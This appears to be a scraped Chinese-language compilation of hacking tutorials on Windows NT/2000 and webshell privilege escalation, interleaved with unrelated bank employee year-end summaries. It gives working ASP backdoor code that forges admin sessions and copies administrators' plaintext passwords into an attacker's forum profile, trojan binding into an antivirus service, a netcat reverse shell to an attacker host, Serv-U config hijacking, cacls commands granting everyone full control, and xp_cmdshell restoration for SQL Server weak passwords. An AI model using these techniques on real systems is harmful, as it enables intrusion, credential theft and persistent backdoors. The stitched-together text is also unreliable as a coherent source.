例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll"

这样就可以了,当你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时,如果没有看见asp.dll,

说明,asp的权限又恢复到以前的权限.

winNT/2000提升权限

Windows NT/2000 通用的提升方法

攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统;2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组;3. 安装后门。

本文简要介绍在Windows NT4和Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法:方法1 :下载系统的%windir%\\repair\\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。

问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。

方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。

问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。

(以上两种是离线的)

方法3 :使用Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。

问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放Netbios连接,就是TCP的139 端口,如果用防火墙过滤了的话Enum 就无法连接到主机。

(以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。

问题:GetAdmin在SP4有补丁修复了,不能用于高于SP4的WinNT 4系统,当然后来又有GetAdmin 的增强版本,不过在SP6a 下好像都不能成功运行。

注:这一方法利用了WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。

(此外还有变通的方法。)

方法5 :在WinNT 4 和Windows 2000 注册表里指定用户Shell 程序(Explorer.exe)

时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。

由于在系统启动时程序的搜索顺序问题使得%Systemdrive%\\Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。

问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。

注:这种方法利用了WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。

问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。

(2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system% \\ system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。

解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。

方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server 端,它仅仅就是捕获用户的登录密码。

问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。

注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》

方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的IIS4 的ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然Windows NT 和Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。

问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。

(2 )静态图像服务缺省没有安装,只有用户在Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。

注:这种方法利用了WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

Windows 2000专用提升漏洞方法方法1 :Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。

注:这一方法利用了Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

方法2 :利用Windows 2000 的Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。

问题:这个服务缺省没有启动,需要启动这个服务。

注:这一方法利用了Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

方法3 :Windows 2000的TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次TELNET 创建服务进程时,便会在本地SYSTEM 环境中

运行攻击者代码。

注:这一方法利用了Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

方法 4 :WINDOWS 2K存在一个利用Debug Registers提升权限的漏洞。如果攻击者能在WIN2K中运行程序,利用此漏洞,他至少能取得对%Windir%\\SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。

注:这一方法利用了Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。

-------------------------------------------------------------------------------- --

-- 巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,呵呵............但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow

me............

session欺骗篇

首先简单说一下一般asp系统的身份验证原理。

一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码去数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。

知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。

动力文章系统3.51,(图一)

图一

其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。

我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp

,其验证内容如下:

............

else

rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")

rs("LastLoginTime")=now()

rs("LoginTimes")=rs("LoginTimes")+1

rs.update

session.Timeout=SessionTimeout

session("AdminName")=rs("username")

rs.close

set rs=nothing

call CloseConn()

Response.Redirect "Admin_Index.asp"

前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:session.Timeout=SessionTimeout

session("AdminName")=rs("username")

我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:

if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if

看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:

dim id

id=trim(request("qwe"))

if id="120" then

session("AdminName")="admin" '这里是假设的,实际操作中可以改成你想要得管理员账号

end if

我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二:

图二

看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三:

图三

呵呵,别做坏事哦............

小结一下:我们先找到弄到管理员账号,然后找到它的验证页面,根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式,比如青创文章系统它不但要验证你的用户名还要验证等级,但是我们总体思路还是一样,就是他验证什么我们就加入什么。

密码窃探篇

可以说上述方法在动网论坛或者其他论坛面前是苍白无力的,因为一般论坛由于交互性较强,所以在验证上考虑了很多。以动网为例,你要登录后台,他先验证你有没有先登录了前台,没有的话就给你返回一个错误页面。你登录前台后系统会给你一个seession来记录你的CacheName和你的ID,然后在你登录后台的时候拿出来比较你前后台身份是否一致,一直就通过,否则kill,面对这样严格的验证,难道我们就没有办法基后台了吗?对,没有了(谁拿鸡蛋扔我?这么浪费。),但是我们可以想新的办法,既然验证这么严格,那么我如果拿着密码光明正大的进去呢?因此,这里一个新的思路就是拿到它的明文密码。什么时候有明文密码呢?对了,就在管理员登录的时候。好,我们就在那里做手脚,把它登录的密码发给我们,然后我们拿和它的密码去登录。呵呵,是不是很像sniffer啊?在下在前几个月刚和好兄弟潜龙在野利用硬件sniffer 配合省网安局的人端掉一个非法电影网站,足足4000G的硬盘,几十台服务器,一个字:爽

好了,我们开始修改它的程序。编辑login.asp,加入以下几句话:

if not isnull(trim(request("username"))) then

if request("username")="admin" then

sql="update [Dv_Vser] set UserEmail=(select userpassword from

[Dv_User]

where username=\'"& request("username")&"\') where

UserName=\'aweige\'"

conn.execute(sql)

end if

end if

这几句话的意思就是说如果admin(假设的,实际操作中改为你要的管理员名字)登录成功就更新数据库,把他的密码放到我资料的E-mail中。当然,你必须先在论坛里注册一个用户名。结果如图四:

图四

还有,如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样,所以实际操作中不可生搬硬套。后记:

对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法,因为你的网站被人家放了马,你根本就没办法去阻止人家去插入,要是谁有好的解决方法记得告诉我。

另外,希望大家不要去搞破坏,那时我真的不愿看到的,也祝所有的网管们好运,希望你们不会碰上craker 们。

--

--

巧用asp木马和KV2004得到管理员权限

重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。

前段时间动网的UPfile.asp漏洞可谓闹的沸沸扬扬,这个漏洞确实很厉害,相信不少新手和我一样种了不少后门在有动网的网站上,但是asp木马的权限确实很底,除了删点文章,删点图片好象没什么用了。不行不得到管理员权限简直就辜负了发现这个漏洞的高手们~v~。好,想办法提升权限,我找啊找!网上提升权限的方法几乎都用过了,都没什么用,补丁打的很全啊!接下来用findpass想解开管理员的密码,又失败,findpass要管理员权限才有用。用pslist看看晕装的是瑞星+天网,网上的大部分工具遇上这个防御组合一般都没用了。种木马?不行一来

权限太底,二来在瑞星杀天网堵的包围下很少能活出来的。做个添加用户权限的bat文件想放到启动组中去,这个方法虽然有点傻但是有一定的可行性,晕又是权限不够加不进去。c盘下的"Program Files" "winnt" "Documents and Settings"三个文件甲都没有写权限,更不要说注册表了。郁闷了,给管理员留了句话,然后匆匆下线。

第2天上来一看,嘿嘿图被改回来了,管理员应该发现了,这次更不容易得手。登上asp木马进去看了一下,昨天传上去的几个exe被删了,还好asp木马活下来了,咦!c盘多了文件甲叫KV2004,原来管理员把瑞星卸了,安了个kv2004,进Program Files看看确实瑞星被卸了。(这里说一下,大部分的杀毒软件默认的安装路径c:\\Program Files\ \,但是kv默认的安装路径是c:\\kv2004\\)到这里机会就来了我们可以把执行文件捆绑在kv2004上,跟随kv一起启动。因为kv不在"Program Files" "winnt" "Documents and Settings"这三个文件甲中,很大可能我可以修改

或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限)

C:\\>del c:\\kv2004\\GetLicense.htm

拒绝访问

奇怪了,再来看看文件甲属性

C:\\>attrib c:\\kv2004

S R C:\\KV2004

哦是只读。

C:\\>attrib -r -s c:\\kv2004

ok!在试试

C:\\>del c:\\kv2004\\GetLicense.htm

成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe 捆绑起来,(注意多下种捆绑器,捆绑一

次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。

C:\\>del c:\\kv2004\\KVSrvXP.exe

拒绝访问

可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名

C:\\>ren c:\\kv2004\\KVSrvXP.exe kv.exe

OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。

4个小时后登上来用:

net user 起用的帐户

已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈!

我觉得入侵没什么固定的模式,具体情况具体分析,杀毒软件同样也可以帮我们忙,这里我只提供了一种思路。请大家指教。

如何绕过防火墙提升权限

本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。

废话少说,咱们进入正题。

首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell 不难。我们这次获得这个webshell,不是DVBBS,而是自由动力 3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp 是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe 上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。

测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a 那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm 里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H:\\long\\sun***\\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \\Documents and Settings\\All Users\\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。

可以浏览D:\\program files\\serv-u\\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。

不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FA T32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost 的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\\,运行srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。

我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员

一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\\ long\\sun***\\lemon,再用刚才nc得到的shell把它们copy到d:\\winnt\\system32\\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\\program files\\serv-u\ \里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)

不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc 这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\\program files\\serv-u\\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。

好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:

ftp>quote site exec net user xr rain /add

在webshell上运行net user,就可以看见添加成功了。

整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit 可以做到的,但是我们觉得系统自带的服务才是最安全的后门。

CAcls命令在提权中的使用

cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览

cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览

cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览

cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览

F:\safe\溢出工具\sqlhello2>cacls

显示或者修改文件的访问控制表(ACL)

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]

[/P user:perm [...]] [/D user [...]]

filename 显示ACL。

/T 更改当前目录及其所有子目录中

指定文件的ACL。

/E 编辑ACL 而不替换。

/C 在出现拒绝访问错误时继续。

/G user:perm 赋予指定用户访问权限。

Perm 可以是: R 读取

W 写入

C 更改(写入)

F 完全控制

/R user 撤销指定用户的访问权限(仅在与/E 一起使用时合法)。

/P user:perm 替换指定用户的访问权限。

Perm 可以是: N 无

R 读取

W 写入

C 更改(写入)

F 完全控制

/D user 拒绝指定用户的访问。

在命令中可以使用通配符指定多个文件。

银行后台员工年终总结怎么写

银行后台员工年终总结怎么写 银行后台员工年终总结1 20__年已过去,在新的1年中,我会1直保持“空杯心态”,虚心学习,继续努力,在今后的工作中,我还应努力做好以下几点: 1、建立爱岗敬业、忘我奉献的精神 比尔·盖茨说过这样1句话:“每天凌晨醒来,1想到所从事的工作和所开发的技术将会给人类生活带来的巨大影响和变化,我就会非常兴奋和激动。”那末是甚么成绩了他的事业?又是甚么创造了他的财富?是责任与豪情!我认为责任是1种人生态度,是珍视未来、爱岗敬业的表现,而豪情则是责任心的完善体现,它是成绩事业的强大气力,这份气力给予了我们充足的动力和勇气,让我们走在岗位的前列,为我们创造出1流的事迹,更加我们构筑了和谐的企业。责任增进发展,豪情成绩事业,我将从身旁的小事做起,从现在做起,将责任扛上双肩,将豪情填满我的工作,奋力拼搏,收获更多的精彩和奇迹! 2、加强业务知识学习、提升合规操作意识 身为网点1线员工,切实提高业务素质和风险防范能力,全面加强柜面营销和柜台服务,是我们临柜人员最为实际的工作任务,起着沟通顾客与银行的桥梁作用。因此,在临柜工作中,坚持要做1个“有心人”。 “没有规矩何成方圆”,加强合规操作意识,其实不是1句挂在嘴边的空话。有时,总是觉得有的规章制度在束缚着我们业务的办理,在制约着我们的业务发展,细细想来,其实不然,各项规章制度的建立,不是平空想象出来产物,而是在经历过许许多多实际工作经验教训总结出来的,只有依照各项规章制度办事,我们才有保护自

已的权益和保护广大客户的权益能力。 3、增强规章制度的履行与监督防范案件意识 规章制度的履行与否,取决于员工对各项规章制度的苏醒认识与熟练掌握程度,有规不遵,有章不遁是各行业之大忌,车行千里始有道,对规章制度的履行,就1线柜员而言,从内部讲要做到从我做起,正确办理每笔业务,认真审核每张票据,监督授权业务的合法合规,严格履行业务操作系统安全防范,抵制各种背规作业等等,做好相互制约,相互监督,不能碍于同事情面或片面寻求经济效益而背离规章制度而不顾。坚持至始至终地按规章办事。如此以来,我们的制度才得于实行,我们的资金安全防范才有保障。再好的制度,如果不能得到好的履行,那也将走向它的反面。 我相信,机遇总是垂青有准备的人,毕生学习才能不断创新。知识造就人材,岗位成绩梦想。有1种事业,需要青春和理想去寻求,有1种寻求需要付出艰辛的劳动和辛苦的汗水,我愿我所从事的招商银行永久年轻和壮丽,兴旺和发达! 银行后台员工年终总结2 由于领导的栽培和信任,我有幸在春节之前加入到___工作中来,自从进入___以来,在部门领导和老同志的关心、帮助下,努力做到爱岗敬业,恪尽职守,以务实的工作风格、坚定的思想信心和饱满的工作热忱,较好地完成了自己的本职工作和领导交办的各项工作。现简单总结: 1、努力改造思想,做好角色转变。由于我之前1直从事_ 工作,这是第1次接触管理的工作,这其中有个角色的转变,虽然_工作使我更加熟习我厂的技术参数、经济指标等,为以后的工作打下了良好的基础,但由于_工作的性质,使我在工作中养成了被动接受、

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

银行营业部的年终工作总结

银行营业部的年终工作总结 200x年在行长室的领导下,各部门的帮助配合下,我们营业部全体员工认真学习、贯彻和落实各项规章制度。围绕市分行提出的“xxxxxx”,以服务工作为中心,结合营业部的工作实际,充分发挥营业部的服务窗口形象,做好全行的会计结算业务,为我行的全年工作做一份努力。 一、做好日常的服务结算工作 做为支行营业部,是一个大型综合网点,既是对外服务窗口,又是全行的业务处理中心,我们认为最重要的就是做好日常的业务处理,对外做好服务工作,对内做好结算工作。 1、节前节后是大量的现金投放与回笼,春节前为满足客户对现金的需要,从人民银行取2款1。5亿,春节一过,又向人民银行回笼了6500万现金。 2、对每年二次的学校收费我们在人员上、业务上给予最大的配合,对收回的现金及时清点入库,并及时开出行政事业收收费发票交回学校,将款项及时划入财政。 3、做好春节及5。1节期间的业务员、管库员及网点的安全保卫工作,考虑到营业部人员比以往减少,在节前即通知各网点要求做好入库钱钞的标准质量,以加快回笼资金的入库,减少

库存。 4、参加xxx大型演唱会的门票出售收款工作,并按排好相关的各项工作,保证在此期间的资金人员安全。 5、上半年协调三个部门做好网上银行的安装工作,并对相关企业进行业务及电脑知识上的培训,努力减少睡眠户的产生。至下半年,为更好地开展电子银行业务,在行长室关心下由营业部与公司业务部负责电子银行的安装服务工作,除了安装与业务知识宣传外,我们更做好对电子银行业务的落地处理工作,一年来未发生有任何的重复、错划或漏划等差错。 6、做好nova1。2、1。3、1。4版本的前期测试及投产工作。 7、配合xx支行做好对xx公司售房款的接款及清点工作。 8、做好本外币帐户清理及结转工作,在11月完成了帐务上收工作,同时在12月底我们成功完成与外管局的信息核对与纠错工作。 9、对电信及中油公司、石油公司的帐户信息调整工作(调为集团帐户)。 10、应电信局的邀请,由xxx对电信局全辖的出纳人员进行假币培训。 11、代理业务处理从个人业务部转到营业部处理,并将全

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/9e12200104.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

银行服务管理工作总结

